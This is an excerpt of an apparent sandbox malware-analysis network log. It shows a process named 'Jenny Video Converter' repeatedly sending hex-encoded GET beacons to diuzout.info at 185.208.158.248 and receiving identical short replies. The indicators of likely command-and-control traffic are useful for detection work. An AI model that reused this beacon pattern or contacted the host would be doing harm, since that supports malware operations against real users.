                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.663207185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:33.515901089 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:34.223546982 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.663208185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:34.348021984 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:35.056972027 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.663209185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:35.176713943 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:35.885575056 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.663210185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:36.005148888 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:36.696521997 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.663211185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:36.816704988 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:37.500720024 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:37.607845068 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:37.843919992 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.663213185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:37.976284981 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:38.666539907 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.663214185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:38.785413980 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:39.488457918 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.663215185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:39.613168955 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:40.324258089 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:40.436297894 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:40.675502062 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.663216185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:40.802942991 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:41.513390064 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:41.623820066 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:41.860819101 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.663217185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:42.021609068 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:42.705235958 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.663218185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:42.832653046 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:43.540287971 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.663219185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:43.660598993 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:44.377959967 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.663220185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:44.542836905 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:45.232326984 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:45.342981100 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:45.583451033 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.663221185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:45.708553076 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:46.404634953 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:46.514856100 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:46.750746965 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.663222185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:46.879548073 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:47.566320896 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.663223185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:47.710681915 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:48.435113907 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:48.545754910 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:48.785010099 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.663224185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:48.910799026 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:49.610023975 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:49.717539072 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:49.955971003 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              60192.168.2.663225185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:50.082608938 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:50.773447037 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
